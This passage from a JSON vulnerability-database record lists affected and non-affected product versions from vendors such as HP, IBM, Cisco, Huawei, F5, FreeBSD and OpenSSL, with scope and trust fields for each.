0.3, "vendor": "hp", "version": "473012.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "fortios build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0589" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0" }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77109.7" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5.2.3" }, { "model": "messagesight server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "safe profile", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "advanced settings utility", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "intelligencecenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.2" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.12" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.3" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dsr-1000n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0.1055" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "key", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "tivoli netcool/system service monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.7" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.00" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.10" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10648" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.9" }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "messaging secure gateway", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.1" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "9.3-beta1-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.12" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1.1" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "security network intrusion prevention system gx5008", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "big-ip psm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "security network intrusion prevention system gx4004", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.7" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "dsr-1000 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null 